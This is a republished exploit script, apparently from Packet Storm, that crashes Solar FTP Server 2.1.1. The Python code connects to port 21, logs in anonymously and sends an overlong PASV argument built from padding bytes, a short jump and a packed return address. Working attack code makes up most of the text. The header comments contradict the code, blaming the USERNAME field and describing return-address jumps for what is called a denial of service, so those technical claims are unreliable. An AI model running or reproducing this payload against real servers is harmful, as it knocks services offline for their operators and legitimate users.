Solar FTP Server 2.1.1 Denial Of Service
2024-2-1 00:36:53 Author: packetstormsecurity.com(查看原文) 阅读量:6 收藏

#!/usr/bin/python

# Exploit Title: Solar FTP Server 2.1.1 PASV Command - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 31 january 2024
# Vendor Homepage: N/A
# Download to demo:
# Notification vendor: No reported
# Tested Version: Solar FTP Server 2.1.1
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo:

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.
import socket,sys,time,struct

if len(sys.argv) < 2:
print("[-]Usage: %s <ip addr> " % sys.argv[0])

sys.exit(0)

ip = sys.argv[1]

if len(sys.argv) > 2:
platform = sys.argv[2]

ret = struct.pack('<L', 0x7C9572D8)

#works when the server is on 192.168.133.128
padding = b"\x43" * 468
junk = b"\x43" * 1532
frontpad = b"\x41" * 100 + b"\xeb\x30" + b"\x41" * 21
payload = frontpad + ret + padding + junk

print ("[+] Solar FTP 2.1.1 PASV - Denied of Service - DoS \n[+] Author: Fernando Mengali\n")
print ("[+] Connecting to "+ip)

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((ip,21))
except:
print("[-] Connection to "+ip+" failed!")
sys.exit(0)

print ("[+] Exploiting")
print("[*] Sending payload to command PASV...")

s.send(b"USER anon\r\n")
s.recv(1024)
s.send(b"PASS anon\r\n")
s.recv(1024)
s.send(b"PASV " + payload + b"\r\n")
print("[+] Done - Exploited")


文章来源: https://packetstormsecurity.com/files/176925/SolarFTP-2.1.1-Exploit.py.txt
如有侵权请联系:admin#unsafe.sh